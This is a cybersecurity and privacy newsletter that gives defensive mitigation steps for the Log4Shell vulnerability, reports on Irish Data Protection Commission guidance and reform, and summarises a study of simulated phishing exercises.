Curated advice, guidance, learning and trends in cybersecurity and privacy, as chosen by our consultants.

Not the Yule log you were hoping for

As 2021 drew to a close, there was no easy end to the year for security professionals. The Log4J flaw (also known as Log4Shell or CVE-2021-44228), emerged in mid December and was quickly dubbed “the most significant vulnerability in the last decade”. It affected widely used open source code, Apache’s Log4J library, in hundreds of millions of devices. This gave it the potential to enable “potentially devastating” attacks including system compromise, data theft, or ransomware infections. Organisations and security teams scrambled to patch the flaw as threat actors were reportedly “actively scanning networks” for it. Cisco and Cloudflare found that some attacks started even before the flaw became public knowledge. 

Cygenta’s excellent, detailed post explains in simple English what the flaw is and why its reach is so extensive. In the meantime, BH Consulting has been advising clients to check how they might be affected by taking these steps. 

– Scan any internet-facing devices/systems to detect if they are vulnerable
– Check this helpful list of vulnerable systems/services to determine if there are any vulnerable products in use within your environment. (It also explains how the relevant vendors propose to manage the vulnerability.)
– Contact your vendors, including cloud service providers, to determine if they are vulnerable to the issue and what steps they are taking to mitigate it
– If patches are available, apply them urgently (making sure to follow vendor guidance on applying those patches)
– Certain releases of Log4j (2.10 and later) let you mitigate the risk by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath
– Where possible, implement a Web Application Firewall in front of any vulnerable internet-facing systems/services to protect those assets until the vendor provides a patch 
– Monitor logs and firewalls for the indicators of compromise. 
The process of discovering all possible weak points means the flaw will affect the internet for some time to come. 

Data protection: new guidance for processors and a new strategy for the agency

Busy times at the Data Protection Commission recently. The agency has published the final version of guidance on child-specific data protection measures, intended to enhance the level of protection for minors against data processing risks. The Children’s Fundamentals is already in effect, and now form the basis for how the DPC will approach supervision, regulation and enforcement in this area. The DPC also unveiled changes to its breach notification form. Data controllers can find a summary of the form on the commission’s website. 

The Commission’s newly published regulatory strategy 2022-2027 sets out a plan for “five crucial years in the evolution of data protection law, regulation and culture”. The regulator has also published a report on the public consultation process. A few weeks before, the Business Post broke the story [PAYWALL] that the agency had written to the Irish Government, asking for urgent reform and a “radical reassessment” of its structure. Its pre-Budget submission described the commission as “unfit for purpose” in its current form. The story is significant because the GDPR’s one-stop-shop mechanism means the DPC is effectively responsible for policing the privacy and data protection activities of the many social media and technology companies with their European headquarters in Ireland. Other European regulators have previously criticised the DPC for a perceived slowness in pursuing cases and unwillingness to levy fines for breaches of the GDPR. Privacy advocate Johnny Ryan said the Government now needs to set up a fully independent review of how to reform and strengthen the DPC. 

Do phishing exercises net the right results?

Regular readers of this newsletter and our blog will know we’re big advocates for raising user awareness about security. Organisations’ own security education campaigns often go hand in hand with simulated phishing exercises designed to test people’s security awareness. Now, a new paper, Phishing in Organizations: Findings from a Large-Scale and Long-Term Study, has made some surprising discoveries. Over 15 months, researchers Daniele Lain, Kari Kostiainen, Srdjan Capkun studied more than 14,000 users with a partner company. The employees received different simulated phishing emails in their normal working day. The company’s email client had a reporting button added to allow participants to report suspicious emails. The researchers measured click rates for phishing emails, dangerous actions such as submitting credentials, and reported suspicious emails. 
 
Some of the findings go against conventional wisdom. The researchers noted: “Surprisingly, we find that embedded training during simulated phishing exercises, as commonly deployed in the industry today, does not make employees more resilient to phishing.” However, the paper also found that warnings on emails are effective, and that crowd-sourcing works. “Using employees as a collective phishing detection mechanism is practical in large organisations,” it said. Plenty of food for thought in the full paper, which is free to download. 

Have you signed up to our monthly newsletter? Every month we send out the latest cybersecurity and data protection news, trends and advice from around the globe. Sign up here